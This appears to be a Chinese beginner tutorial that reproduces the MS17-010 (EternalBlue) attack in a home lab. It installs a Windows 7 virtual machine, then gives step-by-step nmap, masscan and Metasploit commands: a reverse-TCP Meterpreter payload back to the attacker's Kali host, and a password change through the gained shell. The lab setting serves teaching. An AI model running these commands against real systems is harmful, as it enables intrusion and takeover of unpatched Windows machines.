MS17-010漏洞复现(带win7虚拟机安装,零基础)

WIN7虚拟机安装

1.先下载win7原装镜像

MSDN, 我告诉你 - 做一个安静的工具站

MS17-010漏洞复现(带win7虚拟机安装,零基础)_第1张图片

然后打开VM,把虚拟机安装进来

1.选择自定义(高级)

MS17-010漏洞复现(带win7虚拟机安装,零基础)_第2张图片

 2.选择默认的

MS17-010漏洞复现(带win7虚拟机安装,零基础)_第3张图片

3.选择稍后安装系统

MS17-010漏洞复现(带win7虚拟机安装,零基础)_第4张图片

4.选择windows操作系统和 Win7版本

MS17-010漏洞复现(带win7虚拟机安装,零基础)_第5张图片

5.选择合适位置

MS17-010漏洞复现(带win7虚拟机安装,零基础)_第6张图片

 6.选择BIOS

MS17-010漏洞复现(带win7虚拟机安装,零基础)_第7张图片

 7.选择处理器数量

MS17-010漏洞复现(带win7虚拟机安装,零基础)_第8张图片

 8.选择内存大小

MS17-010漏洞复现(带win7虚拟机安装,零基础)_第9张图片

 9.选择网络类型为NET

MS17-010漏洞复现(带win7虚拟机安装,零基础)_第10张图片

之后都选择默认就可以了

10.

MS17-010漏洞复现(带win7虚拟机安装,零基础)_第11张图片

成功完成基础设置

在CD/DVD中选择我们之前下载的镜像文件

1.

MS17-010漏洞复现(带win7虚拟机安装,零基础)_第12张图片

 2.

MS17-010漏洞复现(带win7虚拟机安装,零基础)_第13张图片

点击确定开机

MS17-010漏洞复现(带win7虚拟机安装,零基础)_第14张图片 然后点击安装

MS17-010漏洞复现(带win7虚拟机安装,零基础)_第15张图片

点击接受和下一步

MS17-010漏洞复现(带win7虚拟机安装,零基础)_第16张图片 点击自定义(高级)

 MS17-010漏洞复现(带win7虚拟机安装,零基础)_第17张图片

 等待完成安装重启

取名为admin

MS17-010漏洞复现(带win7虚拟机安装,零基础)_第18张图片

 随便输入一个密码,不记得都可以

MS17-010漏洞复现(带win7虚拟机安装,零基础)_第19张图片

跳过

MS17-010漏洞复现(带win7虚拟机安装,零基础)_第20张图片 使用推荐配置,家庭网络 

MS17-010漏洞复现(带win7虚拟机安装,零基础)_第21张图片

 成功进入后重启

MS17-010漏洞复现(带win7虚拟机安装,零基础)_第22张图片

 开始复现永恒之蓝漏洞(装好win7 64位可以直接跳到这一步)

1、扫描局域网内的C段主机(主机发现)

输入命令:

nmap -sP 192.168.159.1/24

得到主机ip

MS17-010漏洞复现(带win7虚拟机安装,零基础)_第23张图片

192.168.159.141

2、扫描端口获得运行的服务

nmap:

nmap -p 1-65535 -A 192.168.159.141

MS17-010漏洞复现(带win7虚拟机安装,零基础)_第24张图片

masscan:

masscan --rate=10000 -p1-65535 192.168.159.141

MS17-010漏洞复现(带win7虚拟机安装,零基础)_第25张图片 扫描到开放了445端口,而永恒之蓝利用的就是445端口的smb服务,操作系统溢出漏洞,这代表我们可能可以利用永恒之蓝漏洞

 3.进入MSF控制台

命令:

msfconsole

寻找永恒之蓝漏洞:

search ms17-010

MS17-010漏洞复现(带win7虚拟机安装,零基础)_第26张图片

3是永恒之蓝扫描模块,探测主机是否存在永恒之蓝的漏洞

1是永恒之蓝的攻击模块,借此攻击目标用户

我们先要扫描目标是否存在永恒之漏洞

输入命令

use 3

或者

use auxiliary/scanner/smb/smb_ms17_010 

然后查看该模块所需要的参数配置 

show options

MS17-010漏洞复现(带win7虚拟机安装,零基础)_第27张图片 若Required栏为yes则代表该参数需要填写

设置RHOST(攻击目标的ip)

set rhosts  192.168.159.141

执行扫描 

run

 Host is likely VULNERABLE to MS17-010

显示主机很可能能够会受到永恒之蓝漏洞的攻击,代表我们现在可以攻击

开始攻击

使用攻击模块:

use 1

设置payload

set payload windows/x64/meterpreter/reverse_tcp

查看需要配置参数

show options 

MS17-010漏洞复现(带win7虚拟机安装,零基础)_第28张图片

设置目标攻击ip(Win7主机的ip) 

set rhosts 192.168.159.141

设置接受shell的ip(攻击机ip,kali的ip) 

set  LHOST 192.168.159.88

执行攻击

run

MS17-010漏洞复现(带win7虚拟机安装,零基础)_第29张图片

成功拿到权限

查看系统版本

sysinfo

MS17-010漏洞复现(带win7虚拟机安装,零基础)_第30张图片

 修改密码

shell

显示本地计算机的所有用户帐户列表:

net user

该命令用于增加或修改系统用户,以及查看它们的信息。

MS17-010漏洞复现(带win7虚拟机安装,零基础)_第31张图片

修改密码

net user admin 新密码

net user admin 123456

 成功用123456登入MS17-010漏洞复现(带win7虚拟机安装,零基础)_第32张图片

 到这里就完成了基础的渗透

你可能感兴趣的:(windows,linux)